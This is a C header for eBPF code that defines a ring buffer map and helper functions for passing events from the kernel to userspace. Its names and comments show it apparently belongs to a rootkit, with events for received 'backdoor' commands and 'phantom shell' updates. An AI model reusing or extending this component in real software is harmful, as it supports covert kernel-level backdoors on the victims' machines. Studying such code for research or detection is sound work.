#ifndef __RING_BUFFER_H
#define __RING_BUFFER_H
/*#include <linux/bpf.h>
#include <bpf/bpf_helpers.h>*/
#ifndef __H_TCKIT
#include "headervmlinux.h"
#endif
#include <bpf/bpf_tracing.h>
#include <bpf/bpf_core_read.h>
#include "../../../common/map_common.h"
#define RING_BUFFER_MAX_ELEMS 256
/**
 * @brief BPF ring buffer map used for general kernel->userspace communication.
 *
 * For a BPF_MAP_TYPE_RINGBUF map, max_entries is the size of the buffer in
 * bytes, so the capacity is RING_BUFFER_MAX_ELEMS KiB shared by every record
 * that is queued at the same time. The single instance, rb_comm, is placed
 * in the ".maps" section.
 *
 * Note for analysts: a loaded map is normally listed under its name
 * (rb_comm, type ringbuf) by map enumeration such as `bpftool map show`.
 */
struct ring_buffer {
    __uint(type, BPF_MAP_TYPE_RINGBUF);
    /* Several struct rb_event records must fit in this many bytes. */
    __uint(max_entries, RING_BUFFER_MAX_ELEMS * 1024);
} rb_comm SEC(".maps");
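/**
 * @brief Sends an event into the specified kernel ring buffer
 *
 * Reserves one struct rb_event, writes the pid, event_type, code and message
 * fields and submits the record. No other field of struct rb_event is
 * written here.
 *
 * @param rb          Ring buffer map to write to.
 * @param pid         Value stored in the event's pid field.
 * @param event_type  Value stored in the event's event_type field.
 * @param code        Value stored in the event's code field.
 * @param message     Kernel-space string copied into the event's message field.
 * @param message_len Maximum number of bytes to copy, terminator included.
 *                    Values larger than the message field are clamped to it.
 *
 * @return 0 if ok, -1 if error (no space could be reserved)
 */
static __always_inline int ring_buffer_send(struct ring_buffer *rb, int pid, event_type_t event_type, int code, char* message, __u32 message_len){
    struct rb_event *event = (struct rb_event*) bpf_ringbuf_reserve(rb, sizeof(struct rb_event), 0);
    if(!event){
        return -1;
    }

    event->code = code;
    event->event_type = event_type;
    event->pid = pid;

    /* The length comes from the caller; never let it exceed the destination.
     * NOTE(review): assumes rb_event.message is a char array, not a pointer;
     * confirm against map_common.h. */
    __u32 copy_len = message_len;
    if(copy_len > sizeof(event->message)){
        copy_len = sizeof(event->message);
    }

    /* Reserved ring-buffer memory is not zeroed. If nothing is copied (zero
     * length or a failed read) the consumer would otherwise read bytes left
     * behind by an earlier record, so publish an empty string instead. */
    long copied = 0;
    if(copy_len > 0){
        copied = bpf_probe_read_kernel_str(&event->message, copy_len, message);
    }
    if(copied <= 0){
        event->message[0] = '\0';
    }

    bpf_ringbuf_submit(event, 0);
    return 0;
}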
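/**
 * @brief Sends an event indicating a received command in the backdoor
 *
 * Reserves one struct rb_event, sets its event_type to COMMAND, stores pid
 * and code, and submits it.
 *
 * @param rb   Ring buffer map to write to.
 * @param pid  Value stored in the event's pid field.
 * @param code Value stored in the event's code field.
 *
 * @return 0 if ok, -1 if error (no space could be reserved)
 */
static __always_inline int ring_buffer_send_backdoor_command(struct ring_buffer *rb, int pid, int code){
    struct rb_event *event = (struct rb_event*) bpf_ringbuf_reserve(rb, sizeof(struct rb_event), 0);
    if(!event){
        return -1;
    }

    event->code = code;
    event->event_type = COMMAND;
    event->pid = pid;

    /* Reserved ring-buffer memory is not zeroed and this event carries no
     * message, so publish an empty string rather than bytes left behind by
     * an earlier record.
     * NOTE(review): assumes rb_event.message is a char array; bps_data is
     * also left unwritten here. Confirm the consumer ignores it for COMMAND
     * events. */
    event->message[0] = '\0';

    bpf_ringbuf_submit(event, 0);
    return 0;
}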
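/**
 * @brief Sends a PSH_UPDATE event with the supplied phantom shell data attached
 *
 * Reserves one struct rb_event, sets its event_type to PSH_UPDATE, stores
 * pid and code, copies data into the event's bps_data field and submits it.
 *
 * @param rb   Ring buffer map to write to.
 * @param pid  Value stored in the event's pid field.
 * @param code Value stored in the event's code field.
 * @param data Copied by value into the event's bps_data field.
 *
 * @return 0 if ok, -1 if error (no space could be reserved)
 */
static __always_inline int ring_buffer_send_request_update_phantom_shell(struct ring_buffer *rb, int pid, int code, struct backdoor_phantom_shell_data data){
    struct rb_event *event = (struct rb_event*) bpf_ringbuf_reserve(rb, sizeof(struct rb_event), 0);
    if(!event){
        return -1;
    }

    event->code = code;
    event->event_type = PSH_UPDATE;
    event->pid = pid;
    event->bps_data = data;

    /* Reserved ring-buffer memory is not zeroed and this event carries no
     * message, so publish an empty string rather than bytes left behind by
     * an earlier record.
     * NOTE(review): assumes rb_event.message is a char array; confirm
     * against map_common.h. */
    event->message[0] = '\0';

    bpf_ringbuf_submit(event, 0);
    return 0;
}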
#endif